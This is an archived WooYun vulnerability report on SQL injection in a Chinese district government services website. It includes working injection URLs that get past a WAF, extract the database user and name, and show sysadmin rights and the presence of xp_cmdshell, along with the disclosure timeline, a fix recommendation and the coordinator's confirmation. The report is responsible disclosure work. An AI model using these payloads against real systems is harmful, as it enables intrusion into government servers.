当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-057480

漏洞标题:花都区政务服务网SQL注入漏洞

相关厂商:花都区政务服务网

漏洞作者: greg.wu

提交时间:2014-04-29 14:51

修复时间:2014-06-13 14:51

公开时间:2014-06-13 14:51

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-29: 细节已通知厂商并且等待厂商处理中
2014-05-04: 厂商已经确认,细节仅向厂商公开
2014-05-14: 细节向核心白帽子及相关领域专家公开
2014-05-24: 细节向普通白帽子公开
2014-06-03: 细节向实习白帽子公开
2014-06-13: 细节向公众公开

简要描述:

花都区政务服务网对用户输入过滤不当存在多个SQL注入漏洞,sa权限,xp_cmd shell存在,很容易拿到服务器shell了

详细说明:

基本上全站到处都是注入点,虽然有简单的sql注入防护(目测是waf类设备),但还是可以轻松绕过.
其中一个注入点:
http://www.hdamo.gov.cn/login/publicpage.aspx?infotype=bmxx&InfoId=00017&dic_name=%b2%bf%c3%c5%d0%c5%cf%a2
参数InfoId存在注入,InfoId=00017%27/**/and/**/%271%27=%271时页面正常,InfoId=00017%27/**/and/**/%271%27=%272时页面异常

漏洞证明:

采用显错注入方式:
获取当前用户名为:dbo
http://www.hdamo.gov.cn/login/publicpage.aspx?infotype=bmxx&InfoId=00017%27/**/and/**/1=quotename%28user%29--%20&dic_name=%b2%bf%c3%c5%d0%c5%cf%a2

s3.PNG


获取当前数据库为:OutPortalDB

s1.PNG


判断权限为sa,权限很大,xp_cmd shell存在
http://www.hdamo.gov.cn/login/publicpage.aspx?infotype=bmxx&InfoId=00017%27/**/and/**/1=(select/**/IS_SRVROLEMEMBER('sysadmin'))--%20&dic_name=%b2%bf%c3%c5%d0%c5%cf%a2
http://www.hdamo.gov.cn/login/publicpage.aspx?infotype=bmxx&InfoId=00017'/**/and/**/1=(Select/**/count(*)/**/FROM master..sysobjects/**/Where/**/xtype='X'/**/AND/**/name='xp_cmdshell')-- &dic_name=%b2%bf%c3%c5%d0%c5%cf%a2
以上两个链接均正常,说明为sysadmin权限,以及xp_cmd存在

s4.PNG


不继续深入了,怕查水表

修复方案:

过滤和参数化

版权声明:转载请注明来源 greg.wu@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-05-04 11:06

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给广东分中心处置。按进一步可渗透风险进行评分,rank 12

最新状态:

暂无